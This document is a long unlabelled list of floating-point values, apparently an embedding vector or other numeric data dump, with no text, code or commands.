-0.018644193187355995, 0.03512079641222954, 0.002890728646889329, -0.0032678598072379827, 0.005788780283182859, -0.015143830329179764, -0.016432667151093483, -0.016667000949382782, 0.02886701002717018, -0.031752247363328934, 0.049268707633018494, 0.03901659697294235, 0.017838669940829277, 0.025615626946091652, -0.01895175687968731, 0.02072390727698803, 0.00534940417855978, -0.007454747799783945, -0.015466039068996906, -0.0034930401016026735, 0.004071551840752363, -0.015758955851197243, 0.01129196584224701, 0.013335064984858036, -0.009827379137277603, -0.00570822786539793, 0.028925593942403793, -0.005444602109491825, 0.011372518725693226, -0.000672794645652175, 0.060048069804906845, -0.008699647150933743, 0.003826233558356762, 0.002347000641748309, -0.01991838403046131, 0.003064648248255253, 0.00796735379844904, -0.0032843363005667925, -0.00010583929542917758, 0.033334001898765564, -0.009475878439843655, 0.04335177689790726, -0.02215920202434063, 0.009124376811087132, 0.004862429108470678, 0.02665548399090767, -0.010757391341030598, 0.005331096705049276, 0.03722980245947838, -0.02249605767428875, -0.002541058463975787, -0.028925593942403793, 0.031986579298973083, -0.0373469702899456, 0.014777682721614838, -0.0008636486600153148, 0.03667325899004936, -0.020182009786367416, -0.025615626946091652, -0.00969556625932455, 0.015627143904566765, -0.0003128266253042966, -0.013071439228951931, -0.01717960648238659, -0.018966402858495712, -0.008655709214508533, 0.019684050232172012, -0.012287884950637817, -0.0009217744809575379, -0.009893285110592842, -0.0030591562390327454, -0.02211526408791542, 0.004518250934779644, 0.01838056743144989, 0.004697662778198719, -0.0019094552844762802, 0.00502719497308135, -0.004895382095128298, -0.012932303361594677, 0.007828217931091785, -0.014287046156823635, 0.002544719958677888, 0.01895175687968731, -0.006279416847974062, 0.0220127422362566, -0.02475152164697647, -0.004009306896477938, -0.02125115692615509, -0.015963997691869736, -0.03819642961025238, -0.028632676228880882, -0.004086197819560766, 0.0016687138704583049, -0.013928222469985485, -0.007857508957386017, 0.016432667151093483, 0.0006988826207816601, 0.03184012323617935, 0.029599303379654884, -0.006279416847974062, 0.04551936313509941, 0.01861490122973919, -0.002627102890983224, -0.00016259204130619764, -0.02139761671423912, -0.00945390947163105, -0.01838056743144989, 0.0007693658699281514, 0.0000814676532172598, 0.0015515468548983335, -0.016169041395187378, 0.024151040241122246, -0.008816814050078392, 0.003491209354251623, -0.023989936336874962, -0.020518863573670387, 0.025249481201171875, -0.060575321316719055, -0.0311078280210495, -0.005642321426421404, -0.005777795799076557, -0.03766917809844017, -0.012221978977322578, 0.013825701549649239, -0.007059309631586075, -0.004214349202811718, -0.001531408866867423, -0.024868687614798546, -0.025454523041844368, -0.012712615542113781, -0.015348872169852257, -0.004910028073936701, -0.0454900749027729, 0.028002904728055, -0.030668452382087708, -0.03034624271094799, -0.021939514204859734, 0.009021855890750885, 0.03450566902756691, -0.01861490122973919, -0.009629659354686737, 0.007432779297232628, 0.003628514474257827, 0.028705906122922897, -0.015861477702856064, -0.01612510345876217, 0.019552236422896385, -0.019317902624607086, -0.012573479674756527, 0.018834589049220085, 0.0015872461954131722, -0.02416568621993065, 0.01512918435037136, 0.014660515822470188, -0.001577177201397717, 0.051436297595500946, 0.009102408774197102, 0.004910028073936701, -0.016681646928191185, -0.019273964688181877, -0.019976967945694923, -0.012676000595092773, 0.013415616936981678, -0.018014419823884964, 0.03406629338860512, 0.010523057542741299, -0.014579963870346546, 0.002614287892356515, 0.0045804958790540695, 0.0009666274418123066, 0.010010452009737492, -0.00023261761816684157, -0.033041082322597504, -0.037639886140823364, 0.01359136775135994, -0.03283604234457016, 0.0019350856309756637, 0.021983452141284943, 0.009344065561890602, 0.011497008614242077, 0.0060377600602805614, -0.029643241316080093, -0.010786683298647404, -0.005719212349504232, 0.017824023962020874, -0.0040971823036670685, -0.01871742308139801, 0.040041808038949966, 0.03561875596642494, -0.005506847053766251, -0.02382883056998253, 0.02445860393345356, 0.011709373444318771, -0.004895382095128298, -0.006502766627818346, -0.021514782682061195, -0.023052599281072617, -0.027358485385775566, -0.013166637159883976, -0.004287578631192446, -0.012903011403977871, 0.007366872858256102, 0.04358610883355141, -0.017970483750104904, 0.023916706442832947, 0.003112247446551919, 0.008099166676402092, 0.011687404476106167, 0.02355055883526802, -0.052813008427619934, -0.02374095655977726, 0.0023524928838014603, -0.0024641677737236023, -0.027080213651061058, 0.005979176610708237, -0.0217784084379673, -0.012734584510326385, 0.0013822040054947138, 0.003685267176479101, -0.010545026510953903, 0.03201587125658989, 0.011313934810459614, 0.033773377537727356, 0.005440940614789724, 0.022466765716671944, -0.040041808038949966, -0.023330871015787125, 0.0034051649272441864, -0.00921225268393755, 0.01110889296978712, 0.016212979331612587, 0.01230253092944622, -0.029643241316080093, 0.04226798191666603, 0.03131287172436714, -0.01531958021223545, 0.01094046514481306, -0.007194784004241228, -0.021031469106674194, -0.008633740246295929, -0.029994742944836617, 0.03374408558011055, 0.007180138025432825, -0.02498585544526577, -0.0093367425724864, -0.0284715723246336, -0.022510701790452003, -0.04106701910495758, 0.03289462625980377, 0.03840147331357002, 0.019405778497457504, 0.005210268311202526, 0.03722980245947838, 0.011804571375250816, 0.020709261298179626, 0.015378164127469063, -0.007264351472258568, -0.007571915164589882, 0.005711889360100031, 0.030082616955041885, -0.0397196002304554, 0.0044010840356349945, 0.029262449592351913, -0.0032770135439932346, -0.006759068928658962, 0.001705328468233347, 0.05096762999892235, 0.03512079641222954, 0.0064405216835439205, 0.00035287393257021904, -0.025718148797750473, 0.01799977384507656, 0.007762311026453972, -0.022950079292058945, 0.013217898085713387, -0.0070190331898629665, 0.0024824750144034624, -0.00502719497308135, 0.008955949917435646, 0.011562914587557316, -0.019976967945694923, 0.015290288254618645, -0.016549833118915558, -0.0010023267241194844, -0.04461131989955902, -0.04803845286369324, 0.03184012323617935, 0.005353065673261881, 0.01548068504780531, -0.00046569289406761527, 0.005898624192923307, -0.00916831474751234, 0.0007020864286459982, 0.0105303805321455, 0.0059974840842187405, 0.010061712935566902, -0.01909821480512619, 0.01737000234425068, 0.0005180976586416364, 0.026391858235001564, 0.00017002939421217889, -0.029599303379654884, -0.02513231337070465, -0.009798087179660797, 0.009366033598780632, 0.02445860393345356, -0.025718148797750473, -0.013920899480581284, -0.01612510345876217, -0.014265078119933605, -0.030697744339704514, 0.012353791855275631, -0.01827804557979107, -0.005429956596344709, 0.006652886513620615, 0.01665235497057438, -0.005144361872226, -0.006740761920809746, 0.012353791855275631, -0.021895576268434525, -0.015715017914772034, 0.006601626053452492, -0.028925593942403793, -0.0005602045566774905, 0.005239560268819332, -0.04015897586941719, -0.010369276627898216, -0.007399825844913721, -0.003785957582294941, 0.030609868466854095, 0.02498585544526577, -0.028456926345825195, 0.003324612509459257, -0.01756039820611477, -0.007754988502711058, 0.002306724665686488, -0.004558526910841465, -0.012617417611181736, -0.01040589064359665, -0.028559446334838867, 0.01110156998038292, -0.0024879672564566135, -0.020562801510095596, 0.01117479894310236, 0.050469670444726944, 0.008582480251789093, -0.01430901512503624, -0.0015304934931918979, -0.009629659354686737, -0.02804684080183506, -0.018688131123781204, 0.005173653829842806, 0.018073003739118576, -0.0019021324114874005, 0.032718874514102936, 0.010830621235072613, 0.008223656564950943, 0.020709261298179626, 0.0065357196144759655, -0.007421794813126326, 0.005287159234285355, -0.0020229609217494726, 0.008780199103057384, 0.004181395750492811, 0.0033630579710006714, 0.02044563554227352, 0.007495024241507053, -0.03848934546113014, -0.007908769883215427, -0.015509977005422115, -0.02407781034708023, -0.021324386820197105, 0.0014682485489174724, 0.0017877115169540048, -0.02939426153898239, 0.0012146919034421444, 0.0016952594742178917, 0.01098440308123827, 0.0039726924151182175, -0.00899988692253828, 0.009358711540699005, -0.013027501292526722, 0.00335573498159647, -0.02709485962986946, 0.0023909383453428745, 0.007901446893811226, 0.021983452141284943, 0.009607691317796707, 0.0036614674609154463, -0.030756328254938126, 0.03216233104467392, 0.028500864282250404, 0.015920061618089676, -0.009175637736916542, 0.02205668017268181, 0.0022206800058484077, 0.026333274319767952, -0.001627522287890315, -0.011013694107532501, 0.009344065561890602, -0.0039873383939266205, 0.01684275083243847, 0.009673597291111946, -0.011423778720200062, 0.012243947945535183, 0.0009249782306142151, 0.007205768022686243, 0.01804371178150177, -0.002566688694059849, 0.020518863573670387, -0.020562801510095596, 0.015012017451226711, -0.01713566854596138, 0.036204591393470764, 0.014440828002989292, 0.018321983516216278, -0.005115070380270481, -0.010713454335927963, 0.028442280367016792, 0.02924780361354351, -0.010911173187196255, 0.014997371472418308, 0.021602658554911613, -0.0019167782738804817, 0.0059132701717317104, 0.027578173205256462, 0.006264770869165659, 0.010361953638494015, 0.003921431954950094, 0.020841073244810104, -0.023096537217497826, -0.02623075433075428, 0.004558526910841465, 0.009314773604273796, 0.002707655308768153, 0.012903011403977871, -0.005682597868144512, -0.012961595319211483, -0.006803006865084171, 0.008457990363240242, 0.005536139011383057, 0.018732067197561264, -0.017882607877254486, -0.013313096016645432, -0.007194784004241228, -0.004730616230517626, 0.011211413890123367, -0.006554027087986469, -0.021412262693047523, 0.007791602984070778, 0.011445747688412666, 0.03432992100715637, 0.011262673884630203, 0.017062438651919365, -0.008589803241193295, 0.03532584011554718, -0.0028376374393701553, -0.0416528545320034, -0.013598690740764141, -0.0004883482470177114, 0.00815774966031313, 0.020928949117660522, 0.018790651112794876, -0.013100731186568737, -0.020738553255796432, 0.01612510345876217, 0.02278897352516651, -0.01041321363300085, -0.005711889360100031, 0.028398342430591583, 0.01194370724260807, -0.008296885527670383, 0.009307450614869595, 0.004390099551528692, 0.01627156138420105, -0.018453797325491905, 0.00291269738227129, -0.015861477702856064, 0.037259094417095184, -0.025425231084227562, 0.024927271530032158, -0.03274816647171974, -0.00486975209787488, 0.019230028614401817, -0.016959918662905693, 0.009226898662745953, 0.01722354255616665, 0.015963997691869736, 0.032953206449747086, -0.00023959728423506021, -0.024575769901275635, 0.021705180406570435, 0.013862316496670246, 0.008436021395027637, 0.012646708637475967, -0.013898930512368679, -0.00024165686045307666, 0.014272400178015232, 0.0034875478595495224, 0.013430262915790081, 0.025952482596039772, 0.013481523841619492, -0.04092056304216385, 0.008831460028886795, -0.000762958312407136, 0.009461232461035252, 0.03236737474799156, -0.03843076527118683, 0.027695341035723686, 0.01751646026968956, 0.031664371490478516, -0.03969030827283859, -0.013239867053925991, -0.02278897352516651, 0.02005019597709179, -0.00039246355299837887, -0.026963047683238983, 0.008501927368342876, 0.02502979151904583, 0.025293417274951935, 0.002162096556276083, -0.010069035924971104, 0.01074274629354477, -0.005499524064362049, 0.007996644824743271, 0.005400664638727903, -0.003628514474257827, -0.010515734553337097, 0.00875823013484478, -0.04144781455397606, -0.022759681567549706, 0.00033388007432222366, -0.017340710386633873, 0.02536664716899395, 0.01247095875442028, 0.011855832301080227, -0.015231705270707607, -0.009300127625465393, -0.011745988391339779, 0.004503604955971241, -0.004327854607254267, -0.03043411858379841, 0.0002457759983371943, -0.005393341649323702, -0.010017774999141693, -0.026406504213809967, -0.008443344384431839, 0.002079713623970747, -0.0035150088369846344, 0.0015707695856690407, 0.01110889296978712, -0.005613029934465885, 0.002835806692019105, 0.010281400755047798, 0.015466039068996906, -0.020225947722792625, -0.004686678294092417, 0.01947900839149952, 0.021031469106674194, 0.009688243269920349, -0.0003686640120577067, 0.00502353347837925, -0.008897366002202034, -0.0023671388626098633, -0.014492088928818703, 0.020841073244810104, -0.011445747688412666, -0.007374195847660303, 0.026831233873963356, 0.024194978177547455, 0.03629246726632118, -0.005137038882821798, -0.02211526408791542, -0.00804058276116848, -0.0071984450332820415, -0.02297937124967575, 0.0017364509403705597, 0.007886800915002823, 0.020035549998283386, 0.00045310662244446576, -0.009534461423754692, -0.0027461007703095675, 0.005298143718391657, -0.02182234637439251, -0.005246883258223534, 0.028398342430591583, -0.025293417274951935, 0.017838669940829277, -0.02378489263355732, -0.00026774482103064656, 0.016549833118915558, 0.01899569295346737, 0.014199171215295792, 0.013386325910687447, -0.022671807557344437, 0.011365195736289024, 0.018263399600982666, 0.01141645573079586, -0.012544187717139721, 0.02713879756629467, -0.012126781046390533, -0.006792022380977869, 0.005631336942315102, -0.009182960726320744, 0.01488752756267786, 0.009102408774197102, -0.014228463172912598, -0.021719826385378838, -0.020416343584656715, 0.003269690554589033, 0.002416568575426936, 0.005894962698221207, 0.0002540143032092601, -0.004408407025039196, -0.017970483750104904, -0.00031603043316863477, 0.0039726924151182175, -0.020079487934708595, -0.030932078137993813, -0.0016632216284051538, -0.004877074621617794, -0.005752165336161852, 0.0028669291641563177, 0.0070739551447331905, 0.007557269185781479, 0.03655609115958214, 0.0027735617477446795, -0.028295820578932762, -0.025835314765572548, 0.01880529709160328, -0.013225221075117588, -0.01886388100683689, -0.0017538429237902164, 0.0035699307918548584, -0.02120722085237503, 0.035823799669742584, -0.004756246227771044, 0.014082004316151142, -0.02857409231364727, 0.005543462000787258, -0.02005019597709179, 0.023989936336874962, 0.013840347528457642, -0.017780086025595665, 0.0011643467005342245, 0.011431101709604263, 0.03614600747823715, 0.00973950419574976, -0.020255237817764282, 0.005375034175813198, 0.009790764190256596, -0.006989741697907448, -0.00313421618193388, 0.008831460028886795, -0.0005180976586416364, -0.025293417274951935, 0.016974562779068947, -0.010794006288051605, 0.014147910289466381, 0.0005240475293248892, 0.011482362635433674, 0.016403375193476677, 0.0016613908810541034, 0.029467491433024406, -0.007015371695160866, -0.0014581794384866953, -0.006154926959425211, 0.00022975708998274058, -0.004093520808964968, 0.02091430313885212, 0.006290401332080364, 0.015817539766430855, -0.009204929694533348, 0.02426820620894432, 0.00969556625932455, 0.00892665795981884, -0.004488959442824125, -0.01430901512503624, 0.013122700154781342, -0.0454900749027729, 0.0179558377712965, -0.020460281521081924, -0.00458415737375617, -0.020782489329576492, -0.05246150866150856, 0.007520654238760471, -0.008604449220001698, 0.018395213410258293, 0.0020815443713217974, -0.010376598685979843, 0.0013666427694261074, -0.018702777102589607, 0.004730616230517626, -0.005001564510166645, 0.0030262030195444822, 0.013818378560245037, -0.029496783390641212, 0.022422827780246735, 0.033041082322597504, 0.033099666237831116, 0.01737000234425068, -0.012053551152348518, 0.011497008614242077, -0.0036596369463950396, 0.024810103699564934, -0.024473249912261963, -0.002341508399695158, -0.004825814161449671, 0.010347307659685612, 0.002176742535084486, 0.017501814290881157, 0.013313096016645432, 0.007257028948515654, -0.0068249753676354885, -0.005514170043170452, -0.015173121355473995, -0.023155121132731438, 0.01775079406797886, 0.027680695056915283, 0.007674436084926128, 0.007059309631586075, 0.0030921094585210085, 0.000442579883383587, 0.009380679577589035, 0.017413940280675888, 0.021192574873566628, -0.001309890067204833, -0.04636882618069649, -0.005851025227457285, 0.0045548658818006516, -0.01565643586218357, -0.021236512809991837, -0.019654758274555206, 0.001208284287713468, 0.0277539249509573, 0.009051147848367691, -0.0038006033282727003, 0.02618681639432907, -0.03585309162735939, -0.011665435507893562, 0.021265802904963493, 0.003582746023312211, -0.004521912429481745, -0.007099585607647896, 0.026450442150235176, -0.018878526985645294, -0.0020614061504602432, 0.013532783836126328, 0.03517938032746315, -0.004628094844520092, -0.014030743390321732, -0.017882607877254486, -0.0026545641012489796, 0.007341242395341396, 0.017106376588344574, 0.007429117802530527, -0.016256915405392647, -0.011716696433722973, -0.0011460393434390426, -0.024736875668168068, 0.03201587125658989, 0.0020485911518335342, -0.009666274301707745, -0.0016028074314817786, 0.0019222705159336329, -0.00046340448898263276, -0.016549833118915558, 0.012924980372190475, -0.020079487934708595, -0.013642627745866776, 0.001761165913194418, -0.003264198312535882, -0.04135993868112564, -0.015597851946949959, 0.013540106825530529, 0.022906141355633736, 0.006623595021665096, -0.005898624192923307, -0.00880949106067419, -0.016681646928191185, 0.010296046733856201, -0.002392769092693925, -0.02937961556017399, -0.004228995181620121, 0.0032532138284295797, -0.001521339756436646, 0.004770892206579447, -0.004327854607254267, 0.0016623062547296286, 0.0032806750386953354, 0.0016568141290917993, 0.00667851697653532, -0.01165078952908516, -0.015158475376665592, 0.005173653829842806, -0.014572640880942345, 0.008311531506478786, 0.009497846476733685, -0.020504217594861984, -0.012273238971829414, -0.02268645353615284, 0.014733745716512203, -0.01570037379860878, 0.005235898774117231, 0.014645869843661785, 0.0005730196717195213, 0.033480457961559296, 0.0024421988055109978, 0.045109279453754425, -0.0093367425724864, -0.009651628322899342, -0.02114863693714142, 0.0037420198787003756, -0.005323773715645075, 0.0088534289970994, 0.00040962669299915433, -0.00027277934714220464, -0.0000800373891252093, 0.010061712935566902, 0.0005583738093264401, -0.004756246227771044, -0.006616272032260895, 0.002909035887569189, 0.017575044184923172, 0.02507372945547104, 0.012558833695948124, -0.0071984450332820415, -0.015539268031716347, -0.004532896913588047, 0.024107102304697037, 0.018014419823884964, -0.006656548008322716, -0.018658839166164398, 0.004961288534104824, 0.014155233278870583, -0.0025190897285938263, -0.023916706442832947, 0.04440627992153168, 0.01722354255616665, 0.020518863573670387, 0.0017877115169540048, 0.011965676210820675, -0.000887448200955987, -0.007055648136883974, -0.0009766964940354228, -0.0184245053678751, -0.005041840951889753, 0.006740761920809746, -0.0022426489740610123, 0.007820894941687584, -0.017941191792488098, 0.010193525813519955, -0.013386325910687447, -0.023491976782679558, 0.01086723618209362, -0.002070559887215495, -0.0105303805321455, 0.009175637736916542, 0.002240818226709962, 0.008384760469198227, 0.014982725493609905, -0.005525154527276754, -0.014528702944517136, -0.017911899834871292, 0.002420230070129037, 0.012654031626880169, 0.004488959442824125, -0.00973950419574976, -0.001632099156267941, 0.009314773604273796, -0.002511766739189625, 0.0064112297259271145, 0.009497846476733685, -0.005656967405229807, 0.015949353575706482, 0.0100470669567585, 0.0034344566520303488, 0.00028399258735589683, 0.003436287399381399, -0.01455067191272974, 0.016110457479953766, -0.007696405053138733, -0.0022847556974738836, -0.015802893787622452, -0.000321522617014125, -0.037405554205179214, 0.01918609067797661, -0.014067358337342739, 0.009197606705129147, 0.01129196584224701, 0.0015341548714786768, 0.007645144127309322, 0.008802168071269989, -0.0065064276568591595, 0.0007231398485600948, 0.011972999200224876, 0.016696292906999588, 0.013042147271335125, -0.0070739551447331905, -0.0069238352589309216, 0.000021840081899426877, -0.003048171754926443, -0.022994017228484154, 0.008274916559457779, 0.0023122166749089956, 0.0021108360961079597, 0.007469393778592348, 0.01871742308139801, -0.010061712935566902, 0.008457990363240242, 0.011929061263799667, 0.009490523487329483, 0.0065906415693461895, -0.020738553255796432, -0.0017675735289230943, -0.009109731763601303, -0.008582480251789093, -0.0065906415693461895, -0.007667113095521927, -0.0060926820151507854, -0.020592093467712402, -0.02369701862335205, -0.005030856467783451, -0.0003178611514158547, 0.027695341035723686, 0.007487701252102852, -0.004770892206579447, -0.012068197131156921, 0.010632901452481747, 0.010435182601213455, 0.007740342523902655, 0.019757278263568878, -0.01698920875787735, -0.01009832788258791, 0.00985667109489441, 0.00747671676799655, -0.007099585607647896, 0.01105763204395771, -0.005155346356332302, -0.03131287172436714, -0.026172170415520668, -0.012654031626880169, -0.005598383955657482, 0.017267480492591858, -0.012910334393382072, 0.007495024241507053, 0.0062867398373782635, 0.002899882383644581, -0.00751333124935627, -0.007363211363554001, 0.019596174359321594, 0.017457878217101097, -0.0201087798923254, 0.00985667109489441, -0.0004579122760333121, -0.012456312775611877, -0.007667113095521927, -0.0045548658818006516, -0.011526299640536308, 0.017941191792488098, -0.01785331591963768, 0.02388741448521614, -0.004133796785026789, -0.028369050472974777, -0.0045658499002456665, 0.021910222247242928, 0.0019936691969633102, 0.00007740571163594723, -0.009607691317796707, -0.00921225268393755, 0.04718899354338646, -0.037259094417095184, 0.006641902029514313, 0.00000995461505226558, 0.018922464922070503, 0.0009849347406998277, -0.013496169820427895, 0.009490523487329483, -0.02579137682914734, 0.018351275473833084, -0.012793167494237423, -0.008348146453499794, -0.008824137039482594, -0.014155233278870583, 0.014096650294959545, 0.004357146564871073, 0.01000312902033329, 0.014082004316151142, 0.01074274629354477, -0.002784545999020338, -0.01742858625948429, 0.003397841937839985, 0.01476303767412901, 0.01880529709160328, 0.009754149243235588, 0.017267480492591858, 0.01110156998038292, -0.0038518637884408236, -0.012317176908254623, -0.01122605986893177, 0.010947788134217262, -0.006191541440784931, 0.005799764767289162, 0.006524735130369663, 0.016872042790055275, 0.024194978177547455, -0.0029987420421093702, 0.0018819943070411682, 0.0063270158134400845, 0.021075407043099403, -0.019464362412691116, -0.00034692406188696623, 0.010493766516447067, -0.011013694107532501, -0.03456425294280052, 0.007696405053138733, 0.000056581116950837895, 0.007586560677736998, -0.014872881583869457, -0.004503604955971241, 0.010515734553337097, -0.005206606816500425, -0.005667951889336109, -0.005902285687625408, -0.011365195736289024, 0.006737100426107645, -0.018395213410258293, -0.007725696545094252, -0.0003201495565008372, 0.002475152024999261, 0.010017774999141693, -0.007015371695160866, -0.005953546147793531, 0.012990887276828289, 0.002890728646889329, 0.012624740600585938, -0.000016633932318654843, 0.016681646928191185, 0.009878639131784439, -0.04250231385231018, 0.021939514204859734, 0.008260270580649376, 0.0003151150594931096, 0.004078874830156565, 0.016095811501145363, -0.016681646928191185, 0.0034729018807411194, -0.005642321426421404, 0.016300853341817856, -0.00739616435021162, -0.0006389261106960475, -0.01017155684530735, 0.0021419585682451725, 0.00016762656741775572, 0.010281400755047798, 0.01861490122973919, 0.01690133474767208, 0.008816814050078392, 0.0015222551301121712, -0.006623595021665096, 0.014997371472418308, 0.00820901058614254, 0.0011231552343815565, 0.012478281743824482, -0.0007936230977065861, 0.02431214414536953, -0.001264121732674539, -0.005191960837692022, -0.013166637159883976, -0.02135367877781391, 0.007114231586456299, -0.010662193410098553, -0.0017684887861832976, -0.014631224796175957, 0.016007935628294945, 0.004551204387098551, 0.0006192456930875778, 0.023945998400449753, -0.000020338307876954786, -0.028486218303442, 0.009534461423754692, -0.013642627745866776, -0.011284642852842808, -0.02205668017268181, 0.03116641193628311, -0.0011524469591677189, -0.011848509311676025, 0.028588738292455673, -0.010925819166004658, 0.009483201429247856, -0.003862848272547126, -0.008099166676402092, -0.00014886153803672642, -0.005360388662666082, 0.006096343509852886, 0.0011359703494235873, 0.013935545459389687, 0.006297724321484566, 0.017794732004404068, -0.011709373444318771, 0.00099591922480613, 0.016110457479953766, 0.011548268608748913, -0.016857396811246872, 0.017384648323059082, -0.0020083149429410696, -0.0037969418335705996, 0.011863155290484428, 0.0009565583895891905, 0.011753310449421406, -0.003826233558356762, -0.002171250293031335, -0.005968192126601934, 0.007355888374149799, -0.00751333124935627, 0.0049539655447006226, 0.02948213741183281, -0.0047452617436647415, 0.010427859611809254, 0.019449716433882713, 0.005133377388119698, -0.03145932778716087, -0.0023048939183354378, 0.012090166099369526, 0.01330577302724123, -0.014272400178015232, -0.013986806385219097, 0.0093367425724864, -0.0011140014976263046, 0.004210687708109617, 0.0020833751186728477, 0.009248866699635983, -0.004928335547447205, -0.016974562779068947, -0.013854993507266045, 0.008941303938627243, 0.011028340086340904, -0.0027534235268831253, 0.009483201429247856, -0.017164960503578186, -0.0147190997377038, -0.0026179493870586157, 0.020987533032894135, 0.0022353259846568108, 0.016637708991765976, -0.011248028837144375, -0.007165492046624422, -0.01861490122973919, -0.0025520429480820894, 0.011811894364655018, -0.0034326259046792984, -0.005334758199751377, 0.013269158080220222, -0.010156910866498947, -0.013737826608121395, 0.001655898755416274, -0.013459554873406887, -0.004265609662979841, -0.0029859268106520176, -0.0191421527415514, -0.010918496176600456, 0.0201087798923254, 0.018966402858495712, -0.005704566370695829, 0.0009950038511306047, -0.023242997005581856, 0.009746826253831387, -0.01928861066699028, 0.01306411623954773, -0.00756459217518568, 0.01899569295346737, -0.004218010697513819, -0.022481411695480347, -0.0007689081830903888, -0.005737519823014736, -0.002401922829449177, -0.010230140760540962, -0.024253562092781067, -0.0002654563868418336, -0.010134941898286343, 0.0038848170079290867, -0.04270735755562782, 0.015143830329179764, 0.010911173187196255, -0.0028376374393701553, 0.001434379955753684, 0.008069874718785286, 0.005429956596344709, -0.017194252461194992, -0.005422633606940508, -0.0067993453703820705, 0.0013858655001968145, 0.0015845000743865967, -0.013737826608121395, 0.002489798003807664, 0.006887220311909914, 0.011013694107532501, -0.014726422727108002, 0.02861803025007248, -0.010999048128724098, 0.004558526910841465, -0.014440828002989292, -0.0023799538612365723, -0.0004249590856488794, 0.014528702944517136, 0.0062464638613164425, 0.02048957161605358, -0.0005620352458208799, 0.0030445102602243423, -0.031605787575244904, -0.01548068504780531, -0.0015240858774632215, -0.028164008632302284, -0.005818071775138378, -0.025352001190185547, 0.010881881229579449, 0.00347656337544322, 0.015758955851197243, 0.016520541161298752, -0.013532783836126328, -0.0034619176294654608, 0.017780086025595665, 0.005462909583002329, -0.012031582184135914, 0.0032623675651848316, -0.007355888374149799, -0.038079261779785156, -0.0006119227618910372, -0.0049063665792346, -0.026362566277384758, 0.018834589049220085, 0.0035058551002293825, 0.01880529709160328, -0.006762730423361063, -0.018058357760310173, 0.0222617220133543, -0.011269996874034405, 0.01578824780881405, 0.024824749678373337, 0.025161605328321457, 0.006213510408997536, -0.011379840783774853, -0.017824023962020874, 0.011204090900719166, -0.007136200089007616, -0.008509250357747078, 0.01593470759689808, -0.004726954735815525, 0.0031891383696347475, -0.0009043824975378811, 0.009424617514014244, 0.007916092872619629, -0.008428698405623436, 0.011050309054553509, 0.025015145540237427, -0.012683323584496975, 0.010420536622405052, -0.003969030920416117, 0.012500250712037086, 0.010010452009737492, -0.015905415639281273, -0.0186734851449728, -0.019552236422896385, 0.01347420085221529, -0.01117479894310236, 0.018497733399271965, -0.012763875536620617, 0.007257028948515654, 0.002195049775764346, 0.007209429517388344, 0.005737519823014736, -0.009300127625465393, -0.011028340086340904, 0.007092262618243694, -0.014367599040269852, 0.004181395750492811, -0.010134941898286343, 0.02207132615149021, -0.022276367992162704, 0.011196767911314964, -0.016667000949382782, -0.01217804104089737, -0.011614175513386726, -0.0017373663140460849, 0.01105763204395771, -0.0028742521535605192, 0.014579963870346546, -0.04657386615872383, 0.004672032780945301, -0.0067444234155118465, -0.004159427247941494, 0.009966515004634857, -0.00928548164665699, -0.0031433699186891317, 0.007297304924577475, -0.008948626928031445, -0.022422827780246735, -0.007458409294486046, -0.01402342040091753, -0.0007043748046271503, -0.006228156387805939, -0.019083568826317787, 0.017487168312072754, -0.008912011981010437, 0.004825814161449671, 0.009937223047018051, 0.0201087798923254, 0.00904382485896349, 0.008604449220001698, -0.018644193187355995, -0.02230565994977951, -0.0070886011235415936, -0.011965676210820675, -0.019215382635593414, 0.012200010009109974, -0.007366872858256102, 0.0007853847928345203, -0.005525154527276754, 0.009922577068209648, -0.008457990363240242, -0.011518976651132107, -0.0017456046771258116, -0.002226172247901559, 0.009329419583082199, -0.0028797441627830267, -0.011599529534578323, -0.037698470056056976, 0.001147870090790093, 0.005180976819247007, -0.028705906122922897, -0.011438424699008465, 0.008919334970414639, -0.0030994322150945663, -0.0010307030752301216, -0.007004387676715851, -0.014653192833065987, 0.011138183996081352, -0.013825701549649239, 0.00033822807017713785, 0.00828223954886198, 0.0011075939983129501, 0.004298563115298748, 0.018644193187355995, 0.013430262915790081, -0.009446586482226849, -0.011035663075745106, -0.021836992353200912, 0.00787215493619442, -0.005569091998040676, -0.004324193112552166, 0.00027941574808210135, 0.024092456325888634, -0.012807813473045826, -0.008245624601840973, -0.00798932183533907, 0.009666274301707745, -0.013210575096309185, 0.011379840783774853, 0.003965369425714016, -0.0015158476307988167, -0.010259431786835194, 0.005715550854802132, -0.014902172610163689, 0.009219575673341751, 0.0043608080595731735, 0.008868074044585228, 0.019156798720359802, -0.01584683172404766, -0.011035663075745106, -0.00526519026607275, 0.0042216721922159195, -0.00921225268393755, -0.008187041617929935, -0.009688243269920349, -0.0006792022613808513, -0.021456200629472733, -0.024341436102986336, 0.007106908597052097, -0.001876502181403339, -0.017575044184923172, 0.007535300217568874, 0.014287046156823635, 0.0016613908810541034, 0.015378164127469063, 0.021807700395584106, 0.01679881289601326, -0.011160152964293957, -0.0029767730738967657, -0.0025099359918385744, 0.006414891220629215, 0.007209429517388344, -0.002932835603132844, -0.01230253092944622, 0.046310242265462875, 0.005737519823014736, 0.005422633606940508, -0.012639385648071766, 0.008890043012797832, 0.005752165336161852, -0.006264770869165659, 0.004038598854094744, -0.006579657085239887, 0.0067151314578950405, -0.014038066379725933, 0.011240705847740173, -0.008025936782360077, 0.01105763204395771, 0.007015371695160866, 0.014426182024180889, 0.003366719465702772, -0.018292691558599472, 0.007813571952283382, -0.02690446376800537, -0.00046248911530710757, 0.012932303361594677, 0.00092406285693869, -0.006568672601133585, -0.017882607877254486, -0.01675487495958805, 0.004218010697513819, 0.0011670928215608, -0.015817539766430855, -0.0063819377683103085, -0.0184245053678751, -0.008062551729381084, -0.011731342412531376, 0.01181921735405922, 0.010193525813519955, 0.00543361809104681, 0.014997371472418308, 0.002046760404482484, -0.005565430503338575, -0.011914415284991264, -0.007645144127309322, -0.010091004893183708, 0.0007322935271076858, -0.008077197708189487, -0.006759068928658962, -0.009893285110592842, 0.005375034175813198, -0.005173653829842806, -0.00144811044447124, 0.018937110900878906, 0.009087762795388699, -0.011431101709604263, 0.010837944224476814, 0.017238188534975052, -0.01170205045491457, 0.021602658554911613, -0.018819943070411682, 0.013723180629312992, 0.016476603224873543, -0.0008636486600153148, -0.01990373805165291, -0.0013172129401937127, 0.003939738962799311, -0.012785844504833221, -0.01641802117228508, -0.008165072649717331, -0.010852590203285217, 0.019464362412691116, -0.011431101709604263, -0.005510508548468351, 0.011387163773179054, -0.008355469442903996, 0.00635264627635479, 0.028120070695877075, -0.004910028073936701, 0.002004653448238969, -0.002319539664313197, -0.011423778720200062, -0.00008730311674298719, 0.0005602045566774905, -0.027226673439145088, 0.04130135476589203, -0.0033923496957868338, -0.010427859611809254, 